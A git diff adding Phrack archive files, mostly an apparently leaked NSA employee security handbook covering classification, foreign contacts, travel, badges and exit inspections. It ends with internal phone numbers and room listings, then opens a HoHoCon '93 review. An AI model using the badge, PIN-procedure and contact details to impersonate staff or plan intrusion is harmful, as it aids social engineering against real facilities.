+best response is "no comment."  You should the notify Q43 of the attempted
+inquiry.  For the most part, public references to NSA are based upon educated
+guesses.  The Agency does not normally make a practice of issuing public
+statements about its activities.
+
+GENERAL RESPONSIBILITIES
+
+Espionage And Terrorism
+
+During your security indoctrination and throughout your NSA career you will
+become increasingly aware of the espionage and terrorist threat to the United
+States.  Your vigilance is the best single defense in protecting NSA
+information, operations, facilities and people.  Any information that comes to
+your attention that suggests to you the existence of, or potential for,
+espionage or terrorism against the U.S. or its allies must be promptly reported
+by you to the Office of Security.
+
+There should be no doubt in your mind about the reality of the threats.  You
+are now affiliated with the most sensitive agency in government and are
+expected to exercise vigilance and common sense to protect NSA against these
+threats.
+
+Classification
+
+Originators of correspondence, communications, equipment, or documents within
+the Agency are responsible for ensuring that the proper classification,
+downgrading information and, when appropriate, proper caveat notations are
+assigned to such material.  (This includes any handwritten notes which contain
+classified information).  The three levels of classification are Confidential,
+Secret and Top Secret.  The NSA Classification Manual should be used as
+guidance in determining proper classification.  If after review of this document
+you need assistance, contact the Classification Advisory Officer (CAO) assigned
+to your organization, or the Information Policy Division (Q43).
+
+Need-To-Know
+
+Classified information is disseminated only on a strict "need-to-know" basis.
+The "need-to-know" policy means that classified information will be
+disseminated only to those individuals who, in addition to possessing a proper
+clearance, have a requirement to know this information in order to perform
+their official duties (need-to-know).  No person is entitled to classified
+information solely by virtue of office, position, rank, or security clearance.
+
+All NSA personnel have the responsibility to assert the "need-to-know" policy
+as part of their responsibility to protect sensitive information.
+Determination of "need-to-know" is a supervisory responsibility.  This means
+that if there is any doubt in your mind as to an individual's "need-to-know,"
+you should always check with your supervisor before releasing any classified
+material under your control.
+
+For Official Use Only
+
+Separate from classified information is information or material marked "FOR
+OFFICIAL USE ONLY" (such as this handbook).  This designation is used to
+identify that official information or material which, although unclassified, is
+exempt from the requirement for public disclosure of information concerning
+government activities and which, for a significant reason, should not be given
+general circulation.  Each holder of "FOR OFFICAL USE ONLY" (FOUO) information
+or material is authorized to disclose such information or material to persons
+in other departments or agencies of the Executive and Judicial branches when it
+is determined that the information or material is required to carry our a
+government function.  The recipient must be advised that the information or
+material is not to be disclosed to the general public.  Material which bears
+the "FOR OFFICIAL USE ONLY" caveat does not come under the regulations
+governing the protection of classified information.  The unauthorized
+disclosure of information marked "FOR OFFICIAL USE ONLY" does not constitute an
+unauthorized disclosure of classified defense information.  However, Department
+of Defense and NSA regulations prohibit the unauthorized disclosure of
+information designated "FOR OFFICIAL USE ONLY."  Appropriate administrative
+action will be taken to determine responsibility and to apply corrective and/or
+disciplinary measures in cases of unauthorized disclosure of information which
+bears the "FOR OFFICIAL USE ONLY" caveat.  Reasonable care must be exercised in
+limiting the dissemination of "FOR OFFICIAL USE ONLY" information.  While you
+may take this handbook home for further study, remember that is does contain
+"FOR OFFICIAL USE ONLY" information which should be protected.
+
+Prepublication Review
+
+All NSA personnel (employees, military assignees, and contractors) must submit
+for review any planned articles, books, speeches, resumes, or public statements
+that may contain classified, classifiable, NSA-derived, or unclassified
+protected information, e.g., information relating to the organization, mission,
+functions, or activities of NSA.  Your obligation to protect this sensitive
+information is a lifetime one.  Even when you resign, retire, or otherwise end
+your affiliation with NSA, you must submit this type of material for
+prepublication review.  For additional details, contact the Information Policy
+Division (Q43) for an explanation of prepublication review procedures.
+
+Personnel Security Responsibilities
+
+Perhaps you an recall your initial impression upon entering an NSA facility.
+Like most people, you probably noticed the elaborate physical security
+safeguards--fences, concrete barriers, Security Protective Officers,
+identification badges, etc.  While these measures provide a substantial degree
+of protection for the information housed within our buildings, they represent
+only a portion of the overall Agency security program.  In fact, vast amounts
+of information leave our facilities daily in the minds of NSA personnel, and
+this is where our greatest vulnerability lies.  Experience has indicated that
+because of the vital information we work with at NSA, Agency personnel may
+become potential targets for hostile intelligence efforts.  Special safeguards
+are therefore necessary to protect our personnel.
+
+Accordingly, the Agency has an extensive personnel security program which
+establishes internal policies and guidelines governing employee conduct and
+activities.  These policies cover a variety of topics, all of which are
+designed to protect both you and the sensitive information you will gain
+through your work at NSA.
+
+Association With Foreign Nationals
+
+As a member of the U.S. Intelligence Community and by virtue of your access to
+sensitive information, you are a potential target for hostile intelligence
+activities carried out by or on behalf of citizens of foreign
+countries.  A policy concerning association with foreign nationals has been
+established by the Agency to minimize the likelihood that its personnel might
+become subject to undue influence or duress or targets of hostile activities
+through foreign relationships.
+
+As an NSA affiliate, you are prohibited from initiating or maintaining
+associations (regardless of the nature and degree) with citizens or officials
+of communist-controlled, or other countries which pose a significant threat to
+the security of the United States and its interests.  A comprehensive list of
+these designated countries is available from your Staff Security Officer or the
+Security Awareness Division.  Any contact with citizens of these countries, no
+matter how brief or seemingly innocuous, must be reported as soon as possible
+to your Staff Security Officer (SSO).  (Individuals designated as Staff
+Security Officers are assigned to every organization; a listing of Staff
+Security Officers can be found at the back of this handbook).
+
+Additionally, close and continuing associations with any non-U.S. citizens which
+are characterized by ties of kinship, obligation, or affection are prohibited.
+A waiver to this policy may be granted only under the most exceptional
+circumstances when there is a truly compelling need for an individual's
+services or skills and the security risk is negligible.
+
+In particular, a waiver must be granted in advance of a marriage to or
+cohabitation with a foreign national in order to retain one's access to NSA
+information.  Accordingly, any intent to cohabitate with or marry a non-U.S.
+citizen must be reported immediately to your Staff Security Officer.  If a
+waiver is granted, future reassignments both at headquarters and overseas may
+be affected.
+
+The marriage or intended marriage of an immediate family member (parents,
+siblings, children) to a foreign national must also be reported through your
+SSO to the Clearance Division (M55).
+
+Casual social associations with foreign nationals (other than those of the
+designated countries mentioned above) which arise from normal living and
+working arrangements in the community usually do not have to be reported.
+During the course of these casual social associations, you are encouraged to
+extend the usual social amenities.  Do not act mysteriously or draw attention
+to yourself (and possibly to NSA) by displaying an unusually wary attitude.
+
+Naturally, your affiliation with the Agency and the nature of your work should
+not be discussed.  Again, you should be careful not to allow these associations
+to become close and continuing to the extent that they are characterized by
+ties of kinship, obligation, or affection.
+
+If at any time you feel that a "casual" association is in any way suspicious,
+you should report this to your Staff Security Officer immediately.  Whenever
+any doubt exists as to whether or not a situation should be reported or made a
+matter of record, you should decided in favor of reporting it.  In this way,
+the situation can be evaluated on its own merits, and you can be advised as to
+your future course of action.
+
+Correspondence With Foreign Nationals
+
+NSA personnel are discouraged from initiating correspondence with individuals
+who are citizens of foreign countries.  Correspondence with citizens of
+communist-controlled or other designated countries is prohibited.  Casual
+social correspondence, including the "penpal" variety, with other foreign
+acquaintances is acceptable and need not be reported.  If, however, this
+correspondence should escalate in its frequency or nature, you should report
+that through your Staff Security Officer to the Clearance Division (M55).
+
+Embassy Visits
+
+Since a significant percentage of all espionage activity is known to be
+conducted through foreign embassies, consulates, etc., Agency policy
+discourages visits to embassies, consulates or other official establishments of
+a foreign government.  Each case, however, must be judged on the circumstances
+involved.  Therefore, if you plan to visit a foreign embassy for any reason
+(even to obtain a visa), you must consult with, and obtain the prior approval
+of, your immediate supervisor and the Security Awareness Division (M56).
+
+Amateur Radio Activities
+
+Amateur radio (ham radio) activities are known to be exploited by hostile
+intelligence services to identify individuals with access to classified
+information; therefore, all licensed operators are expected to be familiar
+with NSA/CSS Regulation 100-1, "Operation of Amateur Radio Stations" (23
+October 1986).  The specific limitations on contacts with operators from
+communist and designated countries are of particular importance.  If you are
+an amateur radio operator you should advise the Security Awareness Division
+(M56) of your amateur radio activities so that detailed guidance may be
+furnished to you.
+
+Unofficial Foreign Travel
+
+In order to further protect sensitive information from possible compromise
+resulting from terrorism, coercion, interrogation or capture of Agency
+personnel by hostile nations and/or terrorist groups, the Agency has
+established certain policies and procedures concerning unofficial foreign
+travel.
+
+All Agency personnel (civilian employees, military assignees, and contractors)
+who are planning unofficial foreign travel must have that travel approved by
+submitting a proposed itinerary to the Security Awareness Division (M56) at
+least 30 working days prior to their planned departure from the United States.
+Your itinerary should be submitted on Form K2579 (Unofficial Foreign Travel
+Request).  This form provides space for noting the countries to be visited,
+mode of travel, and dates of departure and return.  Your immediate supervisor
+must sign this form to indicate whether or not your proposed travel poses a
+risk to the sensitive information, activities, or projects of which you may
+have knowledge due to your current assignment.
+
+After your supervisor's assessment is made, this form should be forwarded to
+the Security Awareness Director (M56).  Your itinerary will then be reviewed in
+light of the existing situation in the country or countries to be visited, and
+a decision for approval or disapproval will be based on this assessment.  The
+purpose of this policy is to limit the risk of travel to areas of the world
+where a threat may exist to you and to your knowledge of classified Agency
+activities.
+
+In this context, travel to communist-controlled and other hazardous activity
+areas is prohibited.  A listing of these hazardous activity areas is
+prohibited.  A listing of these hazardous activity areas can be found in Annex
+A of NSA/CSS Regulation No. 30-31, "Security Requirements for Foreign Travel"
+(12 June 1987).  From time to time, travel may also be prohibited to certain
+areas where the threat from hostile intelligence services, terrorism, criminal
+activity or insurgency poses an unacceptable risk to Agency employees and to
+the sensitive information they possess.  Advance travel deposits made without
+prior agency approval of the proposed travel may result in financial losses by
+the employee should the travel be disapproved, so it is important to obtain
+approval prior to committing yourself financially.  Questions regarding which
+areas of the world currently pose a threat should be directed to the Security
+Awareness Division (M56).
+
+Unofficial foreign travel to Canada, the Bahamas, Bermuda, and Mexico does not
+require prior approval, however, this travel must still be reported using Form
+K2579.  Travel to these areas may be reported after the fact.
+
+While you do not have to report your foreign travel once you have ended your
+affiliation with the Agency, you should be aware that the risk incurred in
+travelling to certain areas, from a personal safety and/or counterintelligence
+standpoint, remains high.  The requirement to protect the classified
+information to which you have had access is a lifetime obligation.
+
+Membership In Organizations
+
+Within the United States there are numerous organizations with memberships
+ranging from a few to tens of thousands.  While you may certainly participate
+in the activities of any reputable organization, membership in any international
+club or professional organization/activity with foreign members should be
+reported through your Staff Security Officer to the Clearance Division (M55).
+In most cases there are no security concerns or threats to our employees or
+affiliates.  However, the Office of Security needs the opportunity to research
+the organization and to assess any possible risk to you and the information to
+which you have access.
+
+In addition to exercising prudence in your choice of organizational
+affiliations, you should endeavor to avoid participation in public activities
+of a conspicuously controversial nature because such activities could focus
+undesirable attention upon you and the Agency.  NSA employees may, however,
+participate in bona fide public affairs such as local politics, so long as such
+activities do not violate the provisions of the statutes and regulations which
+govern the political activities of all federal employees.  Additional
+information may be obtained from your Personnel Representative.
+
+Changes In Marital Status/Cohabitation/Names
+
+All personnel, either employed by or assigned to NSA, must advise the Office of
+Security of any changes in their marital status (either marriage or divorce),
+cohabitation arrangements, or legal name changes.  Such changes should be
+reported by completing NSA Form G1982 (Report of Marriage/Marital Status
+Change/Name Change), and following the instructions printed on the form.
+
+Use And Abuse Of Drugs
+
+It is the policy of the National Security Agency to prevent and eliminate the
+improper use of drugs by Agency employees and other personnel associated with
+the Agency.  The term "drugs" includes all controlled drugs or substances
+identified and listed in the Controlled Substances Act of 1970, as amended,
+which includes but is not limited to:  narcotics, depressants, stimulants,
+cocaine, hallucinogens ad cannabis (marijuana, hashish, and hashish oil).
+The use of illegal drugs or the abuse of prescription drugs by persons employed
+by, assigned or detailed to the Agency may adversely affect the national
+security; may have a serious damaging effect on the safety and the safety of
+others; and may lead to criminal prosecution.  Such use of drugs either within
+or outside Agency controlled facilities is prohibited.
+
+Physical Security Policies
+
+The physical security program at NSA provides protection for classified
+material and operations and ensures that only persons authorized access to the
+Agency's spaces and classified material are permitted such access.  This
+program is concerned not only with the Agency's physical plant and facilities,
+but also with the internal and external procedures for safeguarding the
+Agency's classified material and activities.  Therefore, physical security
+safeguards include Security Protective Officers, fences, concrete barriers,
+access control points, identification badges, safes, and the
+compartmentalization of physical spaces.  While any one of these safeguards
+represents only a delay factor against attempts to gain unauthorized access to
+NSA spaces and material, the total combination of all these safeguards
+represents a formidable barrier against physical penetration of NSA.  Working
+together with personnel security policies, they provide "security in depth."
+
+The physical security program depends on interlocking procedures.  The
+responsibility for carrying out many of these procedures rests with the
+individual.  This means you, and every person employed by, assign, or detailed
+to the Agency, must assume the responsibility for protecting classified
+material.  Included in your responsibilities are:  challenging visitors in
+operational areas; determining "need-to-know;" limiting classified
+conversations to approved areas; following established locking and checking
+procedures; properly using the secure and non-secure telephone systems;
+correctly wrapping and packaging classified data for transmittal; and placing
+classified waste in burn bags.
+
+The NSA Badge
+
+Even before you enter an NSA facility, you have a constant reminder of
+security--the NSA badge.  Every person who enters an NSA installation is
+required to wear an authorized badge.  To enter most NSA facilities your badge
+must be inserted into an Access Control Terminal at a building entrance and you
+must enter your Personal Identification Number (PIN) on the terminal keyboard.
+In the absence of an Access Control Terminal, or when passing an internal
+security checkpoint, the badge should be held up for viewing by a Security
+Protective Officer.  The badge must be displayed at all times while the
+individual remains within any NSA installation.
+
+NSA Badges must be clipped to a beaded neck chain.  If necessary for the safety
+of those working in the area of electrical equipment or machinery, rubber
+tubing may be used to insulate the badge chain.  For those Agency personnel
+working in proximity to other machinery or equipment, the clip may be used to
+attach the badge to the wearer's clothing, but it must also remain attached to
+the chain.
+
+After you leave an NSA installation, remove your badge from public view, thus
+avoiding publicizing your NSA affiliation.  Your badge should be kept in a safe
+place which is convenient enough to ensure that you will be reminded to bring it
+with you to work.  A good rule of thumb is to afford your badge the same
+protection you give your wallet or your credit cards.  DO NOT write your
+Personal Identification Number on your badge.
+
+If you plan to be away from the Agency for a period of more than 30 days, your
+badge should be left at the main Visitor Control Center which services your
+facility.
+
+Should you lose your badge, you must report the facts and circumstances
+immediately to the Security Operations Center (SOC) (963-3371s/688-6911b) so
+that your badge PIN can be deactivated in the Access Control Terminals.  In the
+event that you forget your badge when reporting for duty, you may obtain a
+"non-retention" Temporary Badge at the main Visitor Control Center which serves
+your facility after a co-worker personally identifies your and your clearance
+has been verified.
+
+Your badge is to be used as identification only within NSA facilities or other
+government installations where the NSA badge is recognized.  Your badge should
+never be used outside of the NSA or other government facilities for the purpose
+of personal identification.  You should obtain a Department of Defense
+identification card from the Civilian Welfare Fund (CWF) if you need to
+identify yourself as a government employee when applying for "government
+discounts" offered at various commercial establishments.
+
+Your badge color indicates your particular affiliation with NSA and your level
+of clearance.  Listed below are explanations of the badge colors you are most
+likely to see:
+
+        Green (*)       Fully cleared NSA employees and certain military
+                        assignees.
+
+        Orange (*)      (or Gold) Fully cleared representative of other
+                        government agencies.
+
+        Black (*)       Fully cleared contractors or consultants.
+
+        Blue            Employees who are cleared to the SECRET level while
+                        awaiting completion of their processing for full
+                        (TS/SI) clearance.  These Limited Interim Clearance
+                        (LIC) employees are restricted to certain activities
+                        while inside a secure area.
+
+        Red             Clearance level is not specified, so assume the holder
+                        is uncleared.
+
+* - Fully cleared status means that the person has been cleared to the Top
+Secret (TS) level and indoctrinated for Special Intelligence (SI).
+
+All badges with solid color backgrounds (permanent badges) are kept by
+individuals until their NSA employment or assignment ends.  Striped badges
+("non-retention" badges) are generally issued to visitors and are returned to
+the Security Protective Officer upon departure from an NSA facility.
+
+Area Control
+
+Within NSA installations there are generally two types of areas,
+Administrative and Secure.  An Administrative Area is one in which storage of
+classified information is not authorized, and in which discussions of a
+classified nature are forbidden.  This type of area would include the
+corridors, restrooms, cafeterias, visitor control areas, credit union, barber
+shop, and drugstore.  Since uncleared, non-NSA personnel are often present in
+these areas, all Agency personnel must ensure that no classified information is
+discussed in an Administrative Area.
+
+Classified information being transported within Agency facilities must be
+placed within envelopes, folders, briefcases, etc. to ensure that its contents
+or classification markings are not disclosed to unauthorized persons, or that
+materials are not inadvertently dropped enroute.
+
+The normal operational work spaces within an NSA facility are designated Secure
+Areas.  These areas are approved for classified discussions and for the storage
+of classified material.  Escorts must be provided if it is necessary for
+uncleared personnel (repairmen, etc.) to enter Secure Areas, an all personnel
+within the areas must be made aware of the presence of uncleared individuals.
+All unknown, unescorted visitors to Secure Areas should be immediately
+challenged by the personnel within the area, regardless of the visitors'
+clearance level (as indicated by their badge color).
+
+The corridor doors of these areas must be locked with a deadbolt and all
+classified information in the area must be properly secured after normal
+working hours or whenever the area is unoccupied.  When storing classified
+material, the most sensitive material must be stored in the most secure
+containers.  Deadbolt keys for doors to these areas must be returned to the key
+desk at the end of the workday.
+
+For further information regarding Secure Areas, consult the Physical Security
+Division (M51) or your staff Security Officer.
+
+Items Treated As Classified
+
+For purposes of transportation, storage and destruction, there are certain
+types of items which must be treated as classified even though they may not
+contain classified information.  Such items include carbon paper, vu-graphs,
+punched machine processing cards, punched paper tape, magnetic tape, computer
+floppy disks, film, and used typewriter ribbons.  This special treatment is
+necessary since a visual examination does not readily reveal whether the items
+contain classified information.
+
+Prohibited Items
+
+Because of the potential security or safety hazards, certain items are
+prohibited under normal circumstances from being brought into or removed from
+any NSA installation.  These items have been groped into two general classes.
+Class I prohibited items are those which constitute a threat to the safety and
+security of NSA/CSS personnel and facilities.  Items in this category include:
+
+        a.  Firearms and ammunition
+        b.  Explosives, incendiary substances, radioactive materials, highly
+            volatile materials, or other hazardous materials
+        c.  Contraband or other illegal substances
+        d.  Personally owned photographic or electronic equipment including
+            microcomputers, reproduction or recording devices, televisions or
+            radios.
+
+Prescribed electronic medical equipment is normally not prohibited, but
+requires coordination with the Physical Security Division (M51) prior to being
+brought into any NSA building.
+
+Class II prohibited items are those owned by the government or contractors
+which constitute a threat to physical, technical, or TEMPEST security.
+Approval by designated organizational officials is required before these items
+can be brought into or removed from NSA facilities.  Examples are:
+
+        a.  Transmitting and receiving equipment
+        b.  Recording equipment and media
+        c.  Telephone equipment and attachments
+        d.  Computing devices and terminals
+        e.  Photographic equipment and film
+
+A more detailed listing of examples of Prohibited Items may be obtained from
+your Staff Security Officer or the Physical Security Division (M51).
+
+Additionally, you may realize that other seemingly innocuous items are also
+restricted and should not be brought into any NSA facility.  Some of these
+items pose a technical threat; others must be treated as restricted since a
+visual inspection does not readily reveal whether they are classified.  These
+items include:
+
+        a.  Negatives from processed film; slides; vu-graphs
+        b.  Magnetic media such as floppy disks, cassette tapes, and VCR
+            videotapes
+        c.  Remote control devices for telephone answering machines
+        d.  Pagers
+
+Exit Inspection
+
+As you depart NSA facilities, you will note another physical security
+safeguard--the inspection of the materials you are carrying.  This inspection
+of your materials, conducted by Security Protective Officers, is designed to
+preclude the inadvertent removal of classified material.  It is limited to any
+articles that you are carrying out of the facility and may include letters,
+briefcases, newspapers, notebooks, magazines, gym bags, and other such items.
+Although this practice may involve some inconvenience, it is conducted in your
+best interest, as well as being a sound security practice.  The inconvenience
+can be considerably reduced if you keep to a minimum the number of personal
+articles that you remove from the Agency.
+
+Removal Of Material From NSA Spaces
+
+The Agency maintains strict controls regarding the removal of material from its
+installations, particularly in the case of classified material.
+
+Only under a very limited and official circumstances classified material be
+removed from Agency spaces.  When deemed necessary, specific authorization is
+required to permit an individual to hand carry classified material out of an NSA
+building to another Secure Area.  Depending on the material and circumstances
+involved, there are several ways to accomplish this.
+
+A Courier Badge authorizes the wearer, for official purposes, to transport
+classified material, magnetic media, or Class II prohibited items between NSA
+facilities.  These badges, which are strictly controlled, are made available by
+the Physical Security Division (M51) only to those offices which have specific
+requirements justifying their use.
+
+An Annual Security Pass may be issued to individuals whose official duties
+require that they transport printed classified materials, information storage
+media, or Class II prohibited items to secure locations within the local area.
+Materials carried by an individual who displays this pass are subject to spot
+inspection by Security Protective Officers or other personnel from the Office
+of Security.  It is not permissible to use an Annual Security Pass for personal
+convenience to circumvent inspection of your personal property by perimeter
+Security Protective Officers.
+
+If you do not have access to a Courier Badge and you have not been issued an
+Annual Security Pass, you may obtain a One-Time Security Pass to remove
+classified materials/magnetic media or admit or remove prohibited items from an
+NSA installation.  These passes may be obtained from designated personnel
+in your work element who have been given authority to issue them.  The issuing
+official must also contact the Security Operations Center (SOC) to obtain
+approval for the admission or removal of a Class I prohibited item.
+
+When there is an official need to remove government property which is not
+magnetic media, or a prohibited or classified item, a One-Time Property Pass is
+used.  This type of pass (which is not a Security Pass) may be obtained from
+your element custodial property officer.  A Property Pass is also to be used
+when an individual is removing personal property which might be reasonably be
+mistaken for unclassified Government property.  This pass is surrendered to the
+Security Protective Officer at the post where the material is being removed.
+Use of this pass does not preclude inspection of the item at the perimeter
+control point by the Security Protective Officer or Security professionals to
+ensure that the pass is being used correctly.
+
+External Protection Of Classified Information
+
+On those occasions when an individual must personally transport classified
+material between locations outside of NSA facilities, the individual who is
+acting as the courier must ensure that the material receives adequate
+protection. Protective measures must include double wrapping and packaging of
+classified information, keeping the material under constant control, ensuring
+the presence of a second appropriately cleared person when necessary, and
+delivering the material to authorized persons only.  If you are designated as a
+courier outside the local area, contact the Security Awareness Division (M56)
+for your courier briefing.
+
+Even more basic than these procedures is the individual security responsibility
+to confine classified conversations to secure areas.  Your home, car pool, and
+public places are not authorized areas to conduct classified discussions--even
+if everyone involved in he discussion possesses a proper clearance and
+"need-to-know."  The possibility that a conversation could be overheard by
+unauthorized persons dictates the need to guard against classified discussions
+in non-secure areas.
+
+Classified information acquired during the course of your career or assignment
+to NSA may not be mentioned directly, indirectly, or by suggestion in personal
+diaries, records, or memoirs.
+
+Reporting Loss Or Disclosure Of Classified Information
+
+The extraordinary sensitivity of the NSA mission requires the prompt reporting
+of any known, suspected, or possible unauthorized disclosure of classified
+information, or the discovery that classified information may be lost, or is not
+being afforded proper protection.  Any information coming to your attention
+concerning the loss or unauthorized disclosure of classified information should
+be reported immediately to your supervisor, your Staff Security Officer, or the
+Security Operations Center (SOC).
+
+Use Of Secure And Non-Secure Telephones
+
+Two separate telephone systems have been installed in NSA facilities for use in
+the conduct of official Agency business:  the secure telephone system (gray
+telephone) and the outside, non-secure telephone system (black telephone).  All
+NSA personnel must ensure that use of either telephone system does not
+jeopardize the security of classified information.
+
+The secure telephone system is authorized for discussion of classified
+information.  Personnel receiving calls on the secure telephone may assume that
+the caller is authorized to use the system.  However, you must ensure that the
+caller has a "need-to-know" the information you will be discussing.
+
+The outside telephone system is only authorized for unclassified official
+Agency business calls.  The discussion of classified information is not
+permitted on this system.  Do not attempt to use "double-talk" in order to
+discuss classified information over the non-secure telephone system.
+
+In order to guard against the inadvertent transmission of classified
+information over a non-secure telephone, and individual using the black
+telephone in an area where classified activities are being conducted must
+caution other personnel in the area that the non-secure telephone is in use.
+Likewise, you should avoid using the non-secure telephone in the vicinity of a
+secure telephone which is also in use.
+
+HELPFUL INFORMATION
+
+Security Resources
+
+In the fulfillment of your security responsibilities, you should be aware that
+there are many resources available to assist you.  If you have any questions or
+concerns regarding security at NSA or your individual security
+responsibilities, your supervisor should be consulted.  Additionally, Staff
+Security Officers are appointed to the designated Agency elements to assist
+these organizations in carrying out their security responsibilities.  There is
+a Staff Security Officer assigned to each organization; their phone numbers are
+listed at the back of this handbook.  Staff Security Officers also provide
+guidance to and monitor the activities of Security Coordinators and Advisors
+(individuals who, in addition to their operational duties within their
+respective elements, assist element supervisors or managers in discharging
+security responsibilities).
+
+Within the Office of Security, the Physical Security Division (M51) will offer
+you assistance in matters such as access control, security passes, clearance
+verification, combination locks, keys, identification badges, technical
+security, and the Security Protective Force.  The Security Awareness Division
+(M56) provides security guidance and briefings regarding unofficial foreign
+travel, couriers, special access, TDY/PCS, and amateur radio activities.  The
+Industrial and Field Security Division (M52) is available to provide security
+guidance concerning NSA contractor and field site matters.
+
+The Security Operations Center (SOC) is operated by two Security Duty Officers
+(SDOs), 24 hours a day, 7 days a week.  The SDO, representing the Office of
+Security, provides a complete range of security services to include direct
+communications with fire and rescue personnel for all Agency area facilities.
+The SDO is available to handle any physical or personnel problems that may
+arise, and if necessary, can direct your to the appropriate security office
+that can assist you.  After normal business hours, weekends, and holidays, the
+SOC is the focal point for all security matters for all Agency personnel and
+facilities (to include Agency field sites and contractors).  The SOC is located
+in Room 2A0120, OPS 2A building and the phone numbers are 688-6911(b),
+963-3371(s).
+
+However, keep in mind that you may contact any individual or any division
+within the Office of Security directly.  Do not hesitate to report any
+information which may affect the security of the Agency's mission, information,
+facilities or personnel.
+
+Security-Related Services
+
+In addition to Office of Security resources, there are a number of
+professional, security-related services available for assistance in answering
+your questions or providing the services which you require.
+
+The Installations and Logistics Organization (L) maintains the system for the
+collection and destruction of classified waste, and is also responsible for the
+movement and scheduling of material via NSA couriers and the Defense Courier
+Service (DCS).  Additionally, L monitors the proper addressing, marking, and
+packaging of classified material being transmitted outside of NSA; maintains
+records pertaining to receipt and transmission of controlled mail; and issues
+property passes for the removal of unclassified property.
+
+The NSA Office of Medical Services (M7) has a staff of physicians, clinical
+psychologists and an alcoholism counselor.  All are well trained to help
+individuals help themselves in dealing with their problems.  Counseling
+services, with referrals to private mental health professionals when
+appropriate, are all available to NSA personnel.  Appointments can be obtained
+by contacting M7 directly.  When an individual refers himself/herself, the
+information discussed in the counseling sessions is regarded as privileged
+medical information and is retained exclusively in M7 unless it pertains to the
+national security.
+
+Counselling interviews are conducted by the Office of Civilian Personnel (M3)
+with any civilian employee regarding both on and off-the-job problems.  M3 is
+also available to assist all personnel with the personal problems seriously
+affecting themselves or members of their families.  In cases of serious
+physical or emotional illness, injury, hospitalization, or other personal
+emergencies, M3 informs concerned Agency elements and maintains liaison with
+family members in order to provide possible assistance.  Similar counselling
+services are available to military assignees through Military Personnel (M2).
+
+GUIDE TO SECURITY
+
+M51 PHYSICAL SECURITY 963-6651s/688-8293b (FMHQ)
+968-8101s/859-6411b (FANX)
+
+CONFIRM and badges              Prohibited Items
+(963-6611s/688-7411b)
+Locks, keys, safes and alarms   SOC (963-3371s/688-6911b)
+Security/vehicle passes         NSA facility protection and compliance
+Visitor Control
+Inspections
+Red/blue seal areas             New Construction
+Pass Clearances (963-4780s/688-6759b)
+
+M52 INDUSTRIAL AND FIELD SECURITY
+982-7918s/859-6255b
+
+Security at contractor field site facilities
+Verification of classified mailing addresses for contractor facilities
+
+M53 INVESTIGATIONS 982-7914s/859-6464b
+
+Personnel Interview Program (PIP)       Reinvestigations
+Military Interview Program (MIP)        Special investigations
+
+M54 COUNTERINTELLIGENCE 982-7832s/859-6424b
+
+Security counterintelligence analysis   Security compromises
+
+M55 CLEARANCES 982-7900s/859-4747b
+
+Privacy Act Officer (For review of security files)      Continued SCI access
+Contractor/applicant processing                         Military access
+
+M56 SECURITY AWARENESS 963-3273s/688-6535b
+
+Security indoctrinations/debriefings            Embassy visits
+Associations with foreign nationals             Briefings (foreign travel,
+Security Week                                     ham radio, courier,
+Security posters, brochures, etc.                 LIC, PCS, TDY,
+                                                  special access, etc.)
+Foreign travel approval
+Military contractor orientation
+Special Access Office (963-5466s/688-6353b)
+
+M57 POLYGRAPH 982-7844s/859-6363b
+
+Polygraph interviews
+
+M509 MANAGEMENT AND POLICY STAFF 982-7885s/859-6350b
+
+STAFF SECURITY OFFICERS (SSOs)
+
+Element                 Room            Secure/Non-Secure
+A                       2A0852B         963-4650/688-7044
+B                       3W099           963-4559/688-7141
+D/Q/J/N/U               2B8066G         963-4496/688-6614
+E/M                     D3B17           968-8050/859-6669
+G                       9A195           963-5033/688-7902
+K                       2B5136          963-1978/688-5052
+L                       SAB4            977-7230/688-6194
+P                       2W091           963-5302/688-7303
+R                       B6B710          968-4073/859-4736
+S/V/Y/C/X               C2A55           972-2144/688-7549
+T                       2B5040          963-4543/688-7364
+W                       1C181           963-5970/688-7061
+
+GUIDE TO SECURITY-RELATED SERVICES
+
+Agency Anonymity                         968-8251/859-4381
+Alcohol Rehabilitation Program          963-5420/688-7312
+Cipher Lock Repair                      963-1221/688-7119
+Courier Schedules (local)               977-7197/688-7403
+Defense Courier Service                 977-7117/688-7826
+Disposal of Classified Waste
+        - Paper only                    972-2150/688-6593
+        - Plastics, Metal, Film, etc    963-4103/688-7062
+Locksmith                               963-3585/688-7233
+Mail Dissemination and Packaging        977-7117/688-7826
+Medical Center (Fort Meade)             963-5429/688-7263
+        (FANX)                          968-8960/859-6667
+        (Airport Square)                982-7800/859-6155
+NSA/CSS Information Policy Division     963-5825/688-6527
+Personnel Assistance
+        - Civilian                      982-7835/859-6577
+        - Air Force                     963-3239/688-7980
+        - Army                          963-3739/688-6393
+        - Navy                          963-3439/688-7325
+Property Passes (unclassified material) 977-7263/688-7800
+Psychological Services                  963-5429/688-7311
+
+FREQUENTLY USED ACRONYMS/DESIGNATORS
+
+ARFCOS  Armed Forces Courier Service (now known as DCS)
+AWOL    Absent Without Leave
+CAO     Classification Advisory Officer
+COB     Close of Business
+CWF     Civilian Welfare Fund
+DCS     Defense Courier Service (formerly known as ARFCOS)
+DoD     Department of Defense
+EOD     Enter on Duty
+FOUO    For Official Use Only
+M2      Office of Military Personnel
+M3      Office of Civilian Personnel
+M5      Office of Security
+M7      Office of Medical Services
+NCS     National Cryptologic School
+PCS     Permanent Change of Station
+PIN     Personal Identification Number
+Q43     Information Policy Division
+SDO     Security Duty Officer
+SOC     Security Operations Center
+SPO     Security Protective Officer
+SSO     Staff Security Officer
+TDY     Temporary Duty
+UFT     Unofficial Foreign Travel
+
+A FINAL NOTE
+
+The information you have just read is designed to serve as a guide to assist
+you in the conduct of your security responsibilities.  However, it by no means
+describes the extent of your obligation to protect information vital to the
+defense of our nation.  Your knowledge of specific security regulations is part
+of a continuing process of education and experience.  This handbook is designed
+to provide he foundation of this knowledge and serve as a guide to the
+development of an attitude of security awareness.
+
+In the final analysis, security is an individual responsibility.  As a
+participant in the activities of the National Security Agency organization, you
+are urged to be always mindful of the importance of the work being accomplished
+by NSA and of the unique sensitivity of the Agency's operations.
diff --git a/phrack45/11.txt b/phrack45/11.txt
new file mode 100644
index 0000000..6800eb5
--- /dev/null
+++ b/phrack45/11.txt
@@ -0,0 +1,627 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 11 of 28
+
+****************************************************************************
+
+                             Ho Ho Con Miscellany
+
+
+  HoHoCon '93 review from the European point of view
+<=====================================================>
+
+This is Onkel Dittmeyer telling you his experiences at
+the HoHoCon, which no-one really gives a @#*! about.
+It might be fun reading anyway.
+
+" Maybe I am just a lumpy coder, but at least my
